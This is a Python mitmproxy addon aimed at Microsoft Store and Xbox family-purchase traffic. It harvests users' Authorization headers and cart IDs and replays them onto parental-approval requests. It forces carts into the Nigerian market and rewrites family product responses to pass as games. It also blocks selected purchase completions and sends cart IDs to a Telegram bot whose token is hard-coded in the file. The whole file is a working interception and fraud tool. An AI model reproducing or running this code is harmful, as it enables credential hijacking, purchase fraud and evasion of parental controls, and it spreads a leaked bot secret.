Files
Xbox-Mitm-Proxy/mitmproxy/addons/mitm_xbox_addon.py
2026-04-23 17:22:20 +08:00

732 lines
26 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# -*- coding: utf-8 -*-
from mitmproxy import http, ctx
import json, re, os, time, uuid, ssl
from urllib import request as urlrequest
from urllib.parse import urlparse, parse_qs, unquote, urlencode, urlunparse
# =========================
# Telegram 推送配置
# =========================
TELEGRAM_BOT_TOKEN = "8293676109:AAG3f6GnZNxJiwxwyGh_OtTU4wGn6-ypg_4"
TELEGRAM_CHAT_ID = "1732587552" # 发送到你的用户ID
TELEGRAM_API_BASE = "https://api.telegram.org"
def _tg_send(text: str):
"""
主动向 Telegram 发送一条消息。
disable_notification=False -> 强制“正常通知”(不要静默)。
即使失败也不会中断 mitmproxy只写日志。
"""
try:
payload = {
"chat_id": TELEGRAM_CHAT_ID,
"text": text,
"parse_mode": "HTML", # 可以放简单加粗/表情
"disable_web_page_preview": True,
"disable_notification": False # 非静默,尽量触发弹窗
}
data = json.dumps(payload, ensure_ascii=False).encode("utf-8")
req = urlrequest.Request(
f"{TELEGRAM_API_BASE}/bot{TELEGRAM_BOT_TOKEN}/sendMessage",
data=data,
method="POST"
)
req.add_header("Content-Type", "application/json")
# 走 HTTPS
ctx_ssl = ssl.create_default_context()
with urlrequest.urlopen(req, context=ctx_ssl, timeout=10) as resp:
# 读一下结果防止连接挂着
_ = resp.read()
ctx.log.info("[tg] sent notification ok")
except Exception as ex:
ctx.log.warn(f"[tg] send failed: {ex}")
# =========================
# 状态持久化 (state.json)
# =========================
DEFAULT_STATE_PATHS = [
"/home/mitmproxy/.mitmproxy/state.json",
"/opt/mitmproxy/state.json",
"/data/mitmproxy/state.json",
os.path.join(os.path.dirname(__file__), "state.json"),
]
def _pick_state_path():
for p in DEFAULT_STATE_PATHS:
d = os.path.dirname(p)
try:
if d and not os.path.exists(d):
os.makedirs(d, exist_ok=True)
return p
except Exception:
continue
return "state.json"
STATE_PATH = _pick_state_path()
def _load_state():
try:
with open(STATE_PATH, "r", encoding="utf-8") as f:
return json.load(f)
except Exception:
return {}
def _save_state(st):
tmp = STATE_PATH + ".tmp"
with open(tmp, "w", encoding="utf-8") as f:
json.dump(st, f, ensure_ascii=False, indent=2, sort_keys=True)
os.replace(tmp, STATE_PATH)
def getv(key, default=""):
st = _load_state()
return st.get(key, default)
def setv(key, value):
st = _load_state()
st[key] = value
_save_state(st)
# =========================
# 三元组存取 (ProductId, SkuId, AvailabilityId)
# =========================
_PRODUCTS_KEY = "__xbox_products__" # list[ {ProductId,SkuId,AvailabilityId} ]
_LISTSTR_KEY = "XboxProductList" # "product1=pid|sku|aid;product2=..."
def _get_products():
data = getv(_PRODUCTS_KEY, [])
if not isinstance(data, list):
return []
out = []
for it in data:
try:
p = str(it.get("ProductId", "")).strip()
s = str(it.get("SkuId", "")).strip()
a = str(it.get("AvailabilityId", "")).strip()
if p and s and a:
out.append({"ProductId": p, "SkuId": s, "AvailabilityId": a})
except Exception:
continue
return out
def _save_products(lst):
"""
- 去重
- 回写到 state.json (__xbox_products__ / XboxProductList)
- 如果 XboxProductList 有变化 -> 主动 Telegram 推送
"""
# 之前的 product list 串,等会对比判断是否更新
old_list_str = getv(_LISTSTR_KEY, "")
# 去重
seen = set()
uniq = []
for it in lst:
key = f"{it['ProductId']}||{it['SkuId']}||{it['AvailabilityId']}"
if key in seen:
continue
seen.add(key)
uniq.append(it)
# 写入内存状态
setv(_PRODUCTS_KEY, uniq)
# 同步生成 XboxProductList 串
parts = []
for i, it in enumerate(uniq, 1):
parts.append(f"product{i}={it['ProductId']}|{it['SkuId']}|{it['AvailabilityId']}")
new_list_str = ";".join(parts)
setv(_LISTSTR_KEY, new_list_str)
# 如果产品列表字符串发生变化 -> 发通知
if new_list_str != old_list_str:
count_now = len(uniq)
_tg_send(f"🔔 XboxProductList 更新\n当前产品数: {count_now}")
def _add_product(pid, sid, aid):
if not (pid and sid and aid):
return False
cur = _get_products()
key = f"{pid}||{sid}||{aid}"
if any((x["ProductId"]+"||"+x["SkuId"]+"||"+x["AvailabilityId"]) == key for x in cur):
return False
cur.append({"ProductId": pid, "SkuId": sid, "AvailabilityId": aid})
_save_products(cur)
return True
# =========================
# HTTP JSON helper
# =========================
def _json_response(flow: http.HTTPFlow, data: dict, status: int = 200):
body = json.dumps(data, ensure_ascii=False, indent=2).encode("utf-8")
flow.response = http.Response.make(
status,
body,
{"Content-Type": "application/json; charset=utf-8"},
)
# =========================
# 抽三元组的递归解析
# =========================
def _extract_triples_from_json_like(text: str):
out = set()
if not text:
return out
data = None
try:
data = json.loads(text)
except Exception:
# 某些接口会返回 ")]}',\n{json...}" 之类,尝试抓第一个 {...} 或 [...]
m = re.search(r"(\{[\s\S]*\}|\[[\s\S]*\])", text)
if m:
try:
data = json.loads(m.group(1))
except Exception:
pass
if data is None:
return out
def is_obj(v):
return isinstance(v, dict)
def visit(node):
if isinstance(node, list):
for v in node:
visit(v)
return
if not is_obj(node):
return
at = node.get("actionType")
if isinstance(at, str) and at.lower() == "cart":
args = node.get("actionArguments", {})
if is_obj(args):
p = str(args.get("ProductId", "")).strip()
s = str(args.get("SkuId", "")).strip()
a = str(args.get("AvailabilityId", "")).strip()
if p and s and a:
out.add((p, s, a))
for v in node.values():
visit(v)
visit(data)
return out
# =========================
# PUT /cart/loadCart 调用工具 (加购)
# =========================
UA = (
"Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_1 like Mac OS X) "
"AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/133.0.3065.54 "
"Version/18.0 Mobile/15E148 Safari/604.1"
)
CART_API_URL = (
"https://cart.production.store-web.dynamics.com/"
"cart/v1.0/cart/loadCart?cartType=consumer&appId=StoreWeb"
)
def _cart_put_single(muid: str, ms_cv: str, pid: str, sid: str, aid: str, x_vec: str = ""):
"""
向微软的购物车接口发一次 PUT, 把 (ProductId, SkuId, AvailabilityId) 放进去。
"""
payload = {
"locale": "en-ng",
"market": "NG",
"catalogClientType": "storeWeb",
"friendlyName": "cart-NG",
"riskSessionId": str(uuid.uuid4()),
"clientContext": {"client": "UniversalWebStore.Cart", "deviceType": "Pc"},
"itemsToAdd": {
"items": [
{
"productId": pid,
"skuId": sid,
"availabilityId": aid,
"campaignId": "xboxcomct",
"quantity": 1,
}
]
},
}
data = json.dumps(payload, separators=(",", ":")).encode("utf-8")
req = urlrequest.Request(CART_API_URL, data=data, method="PUT")
req.add_header("content-type", "application/json")
req.add_header("accept", "*/*")
req.add_header("x-authorization-muid", muid or "")
req.add_header("x-validation-field-1", "9pgbhbppjf2b")
req.add_header("ms-cv", ms_cv or "")
if x_vec:
req.add_header("x-ms-vector-id", x_vec)
req.add_header("accept-language", "en-US,en;q=0.9")
req.add_header("accept-encoding", "gzip, deflate, br")
req.add_header("sec-fetch-site", "cross-site")
req.add_header("sec-fetch-mode", "cors")
req.add_header("sec-fetch-dest", "empty")
req.add_header("origin", "https://www.microsoft.com")
req.add_header("referer", "https://www.microsoft.com/")
req.add_header("user-agent", UA)
try:
ctx_ssl = ssl.create_default_context()
with urlrequest.urlopen(req, context=ctx_ssl, timeout=20) as resp:
return resp.status, (200 <= resp.status < 300), resp.read()[:2048]
except Exception as ex:
return 0, False, str(ex).encode("utf-8", errors="ignore")
# =========================
# 主插件
# =========================
class MitmXboxAddonNoDashV4:
TARGET_IDS = [
"9PNTSH5SKCL5",
"9nfmccp0pm67",
"9npbvj8lwsvn",
"9pcgszz8zpq2",
"9P54FF0VQD7R",
"9NCJZN3LBD3P",
]
RX_XBOX_PATH = re.compile(r"^/([A-Za-z]{2}-[A-Za-z]{2})(/.*)$")
def load(self, loader):
ctx.log.info(f"[xbox-nodash-v4] State path: {STATE_PATH}")
# -----------------
# 本地管理端点 /__xbox/*
# -----------------
def _normalize_seg(self, raw_path: str):
if not raw_path or not raw_path.lower().startswith("/__xbox/"):
return "", ""
seg = raw_path[len("/__xbox/") :].split("?")[0]
rawseg = seg.strip("/")
normseg = re.sub(r"[^a-z0-9]", "", rawseg.lower())
return rawseg, normseg
def _handle_admin(self, flow: http.HTTPFlow):
path = flow.request.path or "/"
rawseg, seg = self._normalize_seg(path)
if not seg:
return False
# /__xbox/check
if seg == "check":
keys = [
"cart-x-authorization-muid",
"cart-ms-cv",
"cart-x-ms-vector-id",
"authorization",
"cartId",
]
state = {
k: getv("fiddler.custom." + k, "")
if k not in ("authorization", "cartId")
else getv(k, "")
for k in keys
}
prods = _get_products()
_json_response(
flow,
{
"ok": True,
"state": state,
"products_count": len(prods),
"XboxProductList": getv(_LISTSTR_KEY, ""),
},
)
return True
# /__xbox/viewproducts
if seg == "viewproducts":
prods = _get_products()
_json_response(
flow,
{
"ok": True,
"count": len(prods),
"products": prods,
"XboxProductList": getv(_LISTSTR_KEY, ""),
},
)
return True
# /__xbox/clearproducts
if seg == "clearproducts":
_save_products([]) # 这个里面也会触发Telegram通知产品数=0
_json_response(flow, {"ok": True, "message": "cleared"})
return True
# /__xbox/addtocart
if seg == "addtocart":
prods = _get_products()
if not prods:
_json_response(
flow, {"ok": False, "error": "no products captured"}, 400
)
return True
muid = getv("fiddler.custom.cart-x-authorization-muid", "")
ms_cv = getv("fiddler.custom.cart-ms-cv", "")
x_vec = getv("fiddler.custom.cart-x-ms-vector-id", "")
if not muid or not ms_cv:
_json_response(
flow,
{
"ok": False,
"error": "missing cart-x-authorization-muid / cart-ms-cv",
},
400,
)
return True
successes, failures = [], []
remaining = list(prods)
for item in prods:
pid = item["ProductId"]
sid = item["SkuId"]
aid = item["AvailabilityId"]
id_triple = f"{pid}/{sid}/{aid}"
code, ok, _ = _cart_put_single(muid, ms_cv, pid, sid, aid, x_vec)
if ok:
successes.append({"triple": id_triple, "status": code})
# 从 remaining 里移除成功的
remaining = [
x
for x in remaining
if not (
x["ProductId"] == pid
and x["SkuId"] == sid
and x["AvailabilityId"] == aid
)
]
else:
failures.append({"triple": id_triple, "status": code or "ERR"})
time.sleep(0.15)
# 写回剩下(没成功的还保留),会触发 _save_products 内部逻辑
_save_products(remaining)
_json_response(
flow,
{
"ok": True,
"tried": len(prods),
"success": len(successes),
"failed": len(failures),
"failures": failures,
"remaining": len(remaining),
},
)
return True
_json_response(
flow,
{
"ok": False,
"error": "unknown admin action",
"seen_seg": seg,
"raw_path": path,
"rawseg": rawseg,
},
404,
)
return True
# -----------------
# 自动 302 跳转规则
# -----------------
def _maybe_redirect(self, flow: http.HTTPFlow):
fullurl = (flow.request.pretty_url or "").strip()
if not fullurl:
return False
# (0) Microsoft Store → Xbox corehalo/<id>
# 匹配 https://www.microsoft.com/en-us/store/...ID(12位)...
# 跳转到 https://www.xbox.com/en-us/games/store/corehalo/ID
try:
m_ms = re.search(
r"(?i)^https?://(?:www\.)?microsoft\.com/en-us/store/.*?([A-Za-z0-9]{12})(?:[\/?#]|$)",
fullurl,
)
if m_ms:
game_id = m_ms.group(1)
new_url = "https://www.xbox.com/en-us/games/store/corehalo/" + game_id
ctx.log.info(f"[xbox-nodash-v4] Redirect microsoft.com -> {new_url}")
html_body = (
"<html><head><meta http-equiv='refresh' content='0;url="
+ new_url
+ "'></head><body>Redirecting to "
+ new_url
+ "</body></html>"
).encode("utf-8", errors="ignore")
flow.response = http.Response.make(
302,
html_body,
{
"Location": new_url,
"Content-Type": "text/html; charset=UTF-8",
},
)
return True
except Exception as e:
ctx.log.warn(f"[xbox-nodash-v4] ms store redirect error: {e}")
# 继续原有的重定向逻辑
parsed = urlparse(fullurl)
host = parsed.hostname or ""
path = parsed.path or ""
query = parsed.query or ""
qd = parse_qs(query, keep_blank_values=True)
# (1) xbox.com 区域纠正成 en-us
if host.lower() == "www.xbox.com":
m = self.RX_XBOX_PATH.match(path)
if m:
region = m.group(1)
suffix = m.group(2) or "/"
if region.lower() not in {"es-ar", "en-us"}:
new = f"https://www.xbox.com/en-us{suffix}"
ctx.log.info(f"[xbox-nodash-v4] Redirect xbox.com {fullurl} -> {new}")
flow.response = http.Response.make(302, b"", {"Location": new})
return True
# (2) xboxfan.com/goto?region=xx → 改成 en-us
if host.lower() == "xboxfan.com" and path.lower().startswith("/goto"):
region_vals = qd.get("region", [])
if region_vals and region_vals[0].lower() not in {"es-ar", "en-us"}:
qd["region"] = ["en-us"]
new_q = urlencode(qd, doseq=True)
new = urlunparse(("https", host, path, "", new_q, ""))
ctx.log.info(f"[xbox-nodash-v4] Redirect xboxfan {fullurl} -> {new}")
flow.response = http.Response.make(302, b"", {"Location": new})
return True
# (3) app.corehalo.com/ms/link/go?r=xx → 改成 en-us
if host.lower() == "app.corehalo.com" and path.lower().startswith("/ms/link/go"):
r_vals = qd.get("r", [])
if r_vals and r_vals[0].lower() not in {"es-ar", "en-us"}:
qd["r"] = ["en-us"]
new_q = urlencode(qd, doseq=True)
new = urlunparse(("https", host, path, "", new_q, ""))
ctx.log.info(f"[xbox-nodash-v4] Redirect corehalo {fullurl} -> {new}")
flow.response = http.Response.make(302, b"", {"Location": new})
return True
return False
# -----------------
# request 钩子
# -----------------
def request(self, flow: http.HTTPFlow):
# 先跑跳转
try:
if self._maybe_redirect(flow):
return
except Exception as e:
ctx.log.warn(f"[xbox-nodash-v4] redirect check error: {e}")
# 管理端点
if self._handle_admin(flow):
return
# 拦截并修补 RequestParentalApproval只改 Authorization 和 cartId
if (
flow.request.host == "buynow.production.store-web.dynamics.com"
and flow.request.method == "POST"
and "/v1.0/Cart/RequestParentalApproval" in flow.request.path
):
cart_id_stored = getv("cartId", "")
auth_stored = getv("authorization", "")
if not cart_id_stored or not auth_stored:
ctx.log.error("[xbox-nodash-v4] 缺少存储的 cartId 或 authorization!")
return
# 覆盖 Authorization 头
flow.request.headers["Authorization"] = auth_stored
# 覆盖请求体里的 cartId
try:
body = flow.request.get_text() or ""
if body:
new_body = re.sub(
r'"cartId"\s*:\s*"[^"]*"',
f'"cartId":"{cart_id_stored}"',
body,
)
if new_body != body:
flow.request.set_text(new_body)
ctx.log.info("[xbox-nodash-v4] 替换 cartId")
else:
ctx.log.warn("[xbox-nodash-v4] 未发现 cartId 字段,仅替换 Authorization")
except Exception as ex:
ctx.log.warn(f"[xbox-nodash-v4] 替换 cartId 失败: {ex}")
host = flow.request.host or ""
path = flow.request.path or ""
fullurl = flow.request.pretty_url or ""
# family 请求拦截
if (
host == "account.microsoft.com"
and flow.request.method == "POST"
and path.startswith("/family/api/buy/requests/complete")
):
body_low = (flow.request.get_text() or "").lower()
for tid in self.TARGET_IDS:
if tid.lower() in body_low:
flow.response = http.Response.make(
403,
b"Blocked by mitmproxy rule",
{"Content-Type": "text/plain; charset=utf-8"},
)
ctx.log.info(f"[xbox-nodash-v4] Blocked family complete for productId: {tid}")
return
# 购物车 body 规范化(强制 NG / en-ng / cart-NG
if host.endswith("store-web.dynamics.com") and "/v1.0/cart" in path:
try:
txt = flow.request.get_text() or ""
if not txt.strip():
return
modified = False
try:
data = json.loads(txt)
mk = data.get("market")
lc = data.get("locale")
fn = data.get("friendlyName")
if mk and mk.upper() != "AR":
data["market"] = "NG"; modified = True
if lc and lc.lower() != "es-ar":
data["locale"] = "en-ng"; modified = True
if fn and fn != "cart-AR":
data["friendlyName"] = "cart-NG"; modified = True
if modified:
flow.request.set_text(json.dumps(data, ensure_ascii=False))
ctx.log.info("[xbox-nodash-v4] cart body normalized to NG")
except Exception:
new = re.sub(r'"market"\s*:\s*"(?!ar|AR)\w{2}"', r'"market":"NG"', txt)
new = re.sub(r'"locale"\s*:\s*"(?!es-ar|es-AR)[\w-]+"', r'"locale":"en-NG"', new)
new = re.sub(r'"friendlyName"\s*:\s*"(?!cart-AR)cart-\w{2}"', r'"friendlyName":"cart-NG"', new)
if new != txt:
flow.request.set_text(new)
ctx.log.info("[xbox-nodash-v4] cart body normalized by regex")
except Exception as ex:
ctx.log.warn(f"[xbox-nodash-v4] cart normalization failed: {ex}")
# eligibilityCheck抓 Authorization 和 cartId
if (
flow.request.method.upper() == "PUT"
and "eligibilitycheck" in path.lower()
and "cart.production.store-web.dynamics.com" in host
):
# 授权头直接存
auth = flow.request.headers.get("Authorization", "")
if auth:
setv("authorization", auth)
# 抓 cartIdquery param 里)
try:
qs = parse_qs(urlparse(fullurl).query)
cart_id = qs.get("cartId", [""])[0] or qs.get("cartid", [""])[0]
if cart_id:
cart_id = unquote(cart_id)
old_cart = getv("cartId", "")
if cart_id != old_cart:
setv("cartId", cart_id)
# cartId 变更 -> 主动推送
_tg_send(f"🔔 cartId 更新:\n{cart_id}")
except Exception:
pass
ctx.log.info("[xbox-nodash-v4] captured eligibilityCheck params")
# loadCart抓购物车请求头
if (
flow.request.method.upper() == "PUT"
and "/v1.0/cart/loadCart" in path
and "cart.production.store-web.dynamics.com" in host
):
for hk, sk in [
("X-Authorization-Muid", "fiddler.custom.cart-x-authorization-muid"),
("MS-CV", "fiddler.custom.cart-ms-cv"),
("X-MS-Vector-Id", "fiddler.custom.cart-x-ms-vector-id"),
]:
val = flow.request.headers.get(hk)
if val:
setv(sk, val)
ctx.log.info("[xbox-nodash-v4] captured loadCart headers")
# -----------------
# response 钩子
# -----------------
def response(self, flow: http.HTTPFlow):
req, resp = flow.request, flow.response
host = (req.host or "").lower()
path = (req.path or "").lower()
# 抓取 productActions(emerald.xboxservices.com),提取三元组 -> _add_product
try:
if (
req.method.upper() == "GET"
and host == "emerald.xboxservices.com"
and path.startswith("/xboxcomfd/productactions/")
):
# 我们只要 locale=en-us 的
if "locale=en-us" in (req.pretty_url or "").lower():
txt = resp.get_text() or ""
triples = _extract_triples_from_json_like(txt)
if triples:
added_cnt = 0
for p, s, a in triples:
if _add_product(p, s, a):
added_cnt += 1
ctx.log.info(
f"[xbox-nodash-v4] productActions captured: +{added_cnt}, total={len(_get_products())}"
)
except Exception as e:
ctx.log.warn(f"[xbox-nodash-v4] capture triples error: {e}")
# family product endpoint把 productKind 改成 "Game"
try:
fullurl = (req.pretty_url or "").strip()
if fullurl.lower().startswith(
"https://account.microsoft.com/family/api/product?puid="
):
txt = ""
try:
txt = resp.get_text()
except Exception:
try:
txt = resp.content.decode("utf-8", errors="replace")
except Exception:
txt = ""
if not txt:
return
try:
data = json.loads(txt)
except Exception as ex:
ctx.log.warn(f"[xbox-nodash-v4] response body not JSON: {ex}")
return
try:
if "productDocument" not in data or not isinstance(data["productDocument"], dict):
data["productDocument"] = {}
pd = data["productDocument"]
if "product" not in pd or not isinstance(pd["product"], dict):
pd["product"] = {}
pd["product"]["productKind"] = "Game"
resp.set_text(json.dumps(data, ensure_ascii=False))
ctx.log.info("[xbox-nodash-v4] Modified productKind -> Game for product endpoint")
except Exception as ex:
ctx.log.warn(f"[xbox-nodash-v4] failed to set productKind: {ex}")
except Exception as e:
ctx.log.warn(f"[xbox-nodash-v4] unexpected in response hook: {e}")
addons = [MitmXboxAddonNoDashV4()]